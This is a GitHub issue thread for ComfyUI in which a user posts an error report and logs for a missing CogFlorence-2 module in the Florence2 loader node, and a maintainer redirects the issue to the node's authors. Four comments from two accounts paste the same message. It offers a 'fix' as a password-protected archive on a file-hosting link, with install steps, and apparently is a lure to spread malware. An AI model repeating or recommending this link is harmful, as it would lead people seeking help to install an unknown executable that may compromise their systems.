### ISSUE TITLE
[Bug]: ModuleNotFoundError in Florence2ModelLoader

### ISSUE THREAD

**Issue by solai25** [comfyanonymous/ComfyUI#4701]
The report has been copied to the clipb
# ComfyUI Error Report
## Error Details
- **Node Type:** Florence2ModelLoader
- **Exception Type:** ModuleNotFoundError
- **Exception Message:** No module named 'transformers_modules.CogFlorence-2'
## Stack Trace
```
  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)

  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)

  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)

  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))

  File "C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Florence2\nodes.py", line 167, in loadmodel
    model = AutoModelForCausalLM.from_pretrained(model_path, attn_implementation=attention, device_map=device, torch_dtype=dtype,trust_remote_code=True)

  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\models\auto\auto_factory.py", line 521, in from_pretrained
    config, kwargs = AutoConfig.from_pretrained(

  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\models\auto\configuration_auto.py", line 1120, in from_pretrained
    config_class = get_class_from_dynamic_module(

  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\dynamic_module_utils.py", line 500, in get_class_from_dynamic_module
    return get_class_in_module(class_name, final_module.replace(".py", ""))

  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\dynamic_module_utils.py", line 200, in get_class_in_module
    module = importlib.import_module(module_path)

  File "importlib\__init__.py", line 126, in import_module

  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import

  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load

  File "<frozen importlib._bootstrap>", line 992, in _find_and_load_unlocked

  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed

  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import

  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load

  File "<frozen importlib._bootstrap>", line 992, in _find_and_load_unlocked

  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed

  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import

  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load

  File "<frozen importlib._bootstrap>", line 1004, in _find_and_load_unlocked

```
## System Information
- **ComfyUI Version:** v0.1.3-20-gc90459e
- **Arguments:** ComfyUI\main.py --windows-standalone-build --preview-method auto
- **OS:** nt
- **Python Version:** 3.10.9 (tags/v3.10.9:1dd9be6, Dec  6 2022, 20:01:21) [MSC v.1934 64 bit (AMD64)]
- **Embedded Python:** true
- **PyTorch Version:** 2.4.0+cu118
## Devices

- **Name:** cuda:0 NVIDIA GeForce RTX 3060 : cudaMallocAsync
  - **Type:** cuda
  - **VRAM Total:** 12884246528
  - **VRAM Free:** 5108210130
  - **Torch VRAM Total:** 8623489024
  - **Torch VRAM Free:** 2026445266

## Logs
```
2024-08-30 08:29:11,840 - root - INFO - Total VRAM 12287 MB, total RAM 16294 MB
2024-08-30 08:29:11,841 - root - INFO - pytorch version: 2.4.0+cu118
2024-08-30 08:29:13,307 - root - INFO - xformers version: 0.0.27.post2+cu118
2024-08-30 08:29:13,307 - root - INFO - Set vram state to: NORMAL_VRAM
2024-08-30 08:29:13,309 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 3060 : cudaMallocAsync
2024-08-30 08:29:13,850 - root - INFO - Using xformers cross attention
2024-08-30 08:29:15,043 - root - INFO - [Prompt Server] web root: C:\ComfyUI_windows_portable\ComfyUI\web
2024-08-30 08:29:19,417 - root - INFO - Total VRAM 12287 MB, total RAM 16294 MB
2024-08-30 08:29:19,417 - root - INFO - pytorch version: 2.4.0+cu118
2024-08-30 08:29:19,418 - root - INFO - xformers version: 0.0.27.post2+cu118
2024-08-30 08:29:19,419 - root - INFO - Set vram state to: NORMAL_VRAM
2024-08-30 08:29:19,419 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 3060 : cudaMallocAsync
2024-08-30 08:29:21,747 - root - INFO - --------------
2024-08-30 08:29:21,748 - root - INFO - [91m ### Mixlab Nodes: [93mLoaded
2024-08-30 08:29:21,749 - root - INFO - ChatGPT.available True
2024-08-30 08:29:21,750 - root - INFO - edit_mask.available True
2024-08-30 08:29:21,758 - root - INFO - LaMaInpainting.available True
2024-08-30 08:29:22,308 - root - INFO - ClipInterrogator.available True
2024-08-30 08:29:22,819 - root - INFO - PromptGenerate.available True
2024-08-30 08:29:22,820 - root - INFO - ChinesePrompt.available True
2024-08-30 08:29:22,820 - root - INFO - RembgNode_.available True
2024-08-30 08:29:23,361 - root - INFO - TripoSR.available
2024-08-30 08:29:23,363 - root - INFO - MiniCPMNode.available
2024-08-30 08:29:23,363 - root - INFO - [93m -------------- [0m
2024-08-30 08:29:26,087 - datasets - INFO - PyTorch version 2.4.0+cu118 available.
2024-08-30 08:29:27,588 - auto_gptq.nn_modules.qlinear.qlinear_cuda - WARNING - CUDA extension not installed.
2024-08-30 08:29:27,592 - auto_gptq.nn_modules.qlinear.qlinear_cuda_old - WARNING - CUDA extension not installed.
2024-08-30 08:29:31,826 - root - INFO - 
Import times for custom nodes:
2024-08-30 08:29:31,826 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-LJNodes
2024-08-30 08:29:31,827 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\websocket_image_save.py
2024-08-30 08:29:31,827 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-SDXL-EmptyLatentImage
2024-08-30 08:29:31,828 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Styles_CSV_Loader
2024-08-30 08:29:31,828 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\sdxl_prompt_styler
2024-08-30 08:29:31,829 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\cg-use-everywhere
2024-08-30 08:29:31,829 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_TiledKSampler
2024-08-30 08:29:31,830 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_NestedNodeBuilder
2024-08-30 08:29:31,830 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-lama-remover
2024-08-30 08:29:31,832 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-inpaint-nodes
2024-08-30 08:29:31,833 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
2024-08-30 08:29:31,833 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyMath
2024-08-30 08:29:31,833 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_essentials
2024-08-30 08:29:31,834 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\SeargeSDXL
2024-08-30 08:29:31,834 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_UltimateSDUpscale
2024-08-30 08:29:31,835 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Frame-Interpolation
2024-08-30 08:29:31,835 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Custom-Scripts
2024-08-30 08:29:31,835 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
2024-08-30 08:29:31,836 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\Derfuu_ComfyUI_ModdedNodes
2024-08-30 08:29:31,836 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\rgthree-comfy
2024-08-30 08:29:31,837 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\efficiency-nodes-comfyui
2024-08-30 08:29:31,837 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-LivePortrait
2024-08-30 08:29:31,837 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-VideoHelperSuite
2024-08-30 08:29:31,838 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Inspire-Pack
2024-08-30 08:29:31,838 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-KJNodes
2024-08-30 08:29:31,839 - root - INFO -    0.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Florence2
2024-08-30 08:29:31,839 - root - INFO -    0.1 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_dagthomas
2024-08-30 08:29:31,839 - root - INFO -    0.1 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-AnimateDiff-Evolved
2024-08-30 08:29:31,840 - root - INFO -    0.1 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_controlnet_aux
2024-08-30 08:29:31,840 - root - INFO -    0.1 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_segment_anything
2024-08-30 08:29:31,841 - root - INFO -    0.1 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_tinyterraNodes
2024-08-30 08:29:31,841 - root - INFO -    0.2 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Crystools
2024-08-30 08:29:31,841 - root - INFO -    0.3 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack
2024-08-30 08:29:31,842 - root - INFO -    0.5 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_FizzNodes
2024-08-30 08:29:31,842 - root - INFO -    0.6 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager
2024-08-30 08:29:31,843 - root - INFO -    0.7 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-SUPIR
2024-08-30 08:29:31,843 - root - INFO -    0.8 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfy_mtb
2024-08-30 08:29:31,843 - root - INFO -    1.2 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-reactor-node
2024-08-30 08:29:31,844 - root - INFO -    1.8 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\Comfyui_image2prompt
2024-08-30 08:29:31,844 - root - INFO -    2.0 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-AdvancedLivePortrait
2024-08-30 08:29:31,845 - root - INFO -    2.9 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui
2024-08-30 08:29:31,845 - root - INFO -    3.3 seconds: C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes
2024-08-30 08:29:31,845 - root - INFO - 
2024-08-30 08:29:31,875 - root - INFO - 

2024-08-30 08:29:31,875 - root - INFO - 

Starting server
2024-08-30 08:29:31,877 - root - INFO - [93mTo see the GUI go to: http://192.168.56.1:8188 or http://127.0.0.1:8188
2024-08-30 08:29:31,877 - root - INFO - [93mTo see the GUI go to: https://192.168.56.1:8189 or https://127.0.0.1:8189[0m
2024-08-30 08:31:22,654 - root - INFO - got prompt
2024-08-30 08:31:23,674 - root - INFO - model weight dtype torch.float16, manual cast: None
2024-08-30 08:31:23,676 - root - INFO - model_type EPS
2024-08-30 08:31:27,083 - root - INFO - Using xformers attention in VAE
2024-08-30 08:31:27,086 - root - INFO - Using xformers attention in VAE
2024-08-30 08:31:27,608 - root - INFO - Requested to load SDXLClipModel
2024-08-30 08:31:27,609 - root - INFO - Loading 1 new model
2024-08-30 08:31:27,635 - root - INFO - loaded completely 0.0 1560.802734375 True
2024-08-30 08:31:28,577 - root - INFO - loaded straight to GPU
2024-08-30 08:31:28,577 - root - INFO - Requested to load SDXL
2024-08-30 08:31:28,579 - root - INFO - Loading 1 new model
2024-08-30 08:31:29,496 - root - INFO - loaded completely 0.0 4897.0483474731445 True
2024-08-30 08:31:30,085 - dinov2 - INFO - using MLP layer as FFN
2024-08-30 08:31:41,630 - root - WARNING - warning, embedding:badhandv4, does not exist, ignoring
2024-08-30 08:31:41,656 - root - WARNING - warning, embedding:badhandv4, does not exist, ignoring
2024-08-30 08:31:41,662 - root - INFO - Requested to load SDXLClipModel
2024-08-30 08:31:41,662 - root - INFO - Loading 1 new model
2024-08-30 08:31:42,410 - root - INFO - loaded completely 0.0 1560.802734375 True
2024-08-30 08:31:42,418 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,418 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,418 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,419 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,419 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,419 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,420 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:42,420 - root - WARNING - WARNING: shape mismatch when trying to apply embedding, embedding will be ignored 768 != 1280
2024-08-30 08:31:46,105 - root - INFO - Requested to load CLIPVisionModelProjection
2024-08-30 08:31:46,105 - root - INFO - Loading 1 new model
2024-08-30 08:31:46,923 - root - INFO - loaded completely 0.0 1208.09814453125 True
2024-08-30 08:31:56,382 - root - INFO - Requested to load SDXL
2024-08-30 08:31:56,382 - root - INFO - Requested to load ControlNet
2024-08-30 08:31:56,384 - root - INFO - Loading 2 new models
2024-08-30 08:31:58,543 - root - INFO - loaded completely 0.0 2396.797637939453 True
2024-08-30 08:32:16,555 - root - INFO - Requested to load AutoencoderKL
2024-08-30 08:32:16,556 - root - INFO - Loading 1 new model
2024-08-30 08:32:19,123 - root - INFO - loaded completely 0.0 159.55708122253418 True
2024-08-30 08:32:20,518 - root - INFO - Prompt executed in 57.71 seconds
2024-08-30 08:32:24,281 - root - INFO - got prompt
2024-08-30 08:32:24,668 - root - ERROR - !!! Exception during processing !!! No module named 'transformers_modules.CogFlorence-2'
2024-08-30 08:32:24,679 - root - ERROR - Traceback (most recent call last):
  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "C:\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
  File "C:\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Florence2\nodes.py", line 167, in loadmodel
    model = AutoModelForCausalLM.from_pretrained(model_path, attn_implementation=attention, device_map=device, torch_dtype=dtype,trust_remote_code=True)
  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\models\auto\auto_factory.py", line 521, in from_pretrained
    config, kwargs = AutoConfig.from_pretrained(
  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\models\auto\configuration_auto.py", line 1120, in from_pretrained
    config_class = get_class_from_dynamic_module(
  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\dynamic_module_utils.py", line 500, in get_class_from_dynamic_module
    return get_class_in_module(class_name, final_module.replace(".py", ""))
  File "C:\ComfyUI_windows_portable\python_embeded\lib\site-packages\transformers\dynamic_module_utils.py", line 200, in get_class_in_module
    module = importlib.import_module(module_path)
  File "importlib\__init__.py", line 126, in import_module
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 992, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 992, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1004, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'transformers_modules.CogFlorence-2'

2024-08-30 08:32:24,682 - root - INFO - Prompt executed in 0.28 seconds
```
## Attached Workflow
Please make sure that workflow does not contain any sensitive information such as API keys or passwords.
```
Workflow too large. Please manually upload the workflow from local file system.
```

## Additional Context
(Please add any additional context or steps to reproduce the error here)
oard. Please paste it here.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mcmonkey4eva** [comment]
This is an issue with the florence2 nodes, not comfyui

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
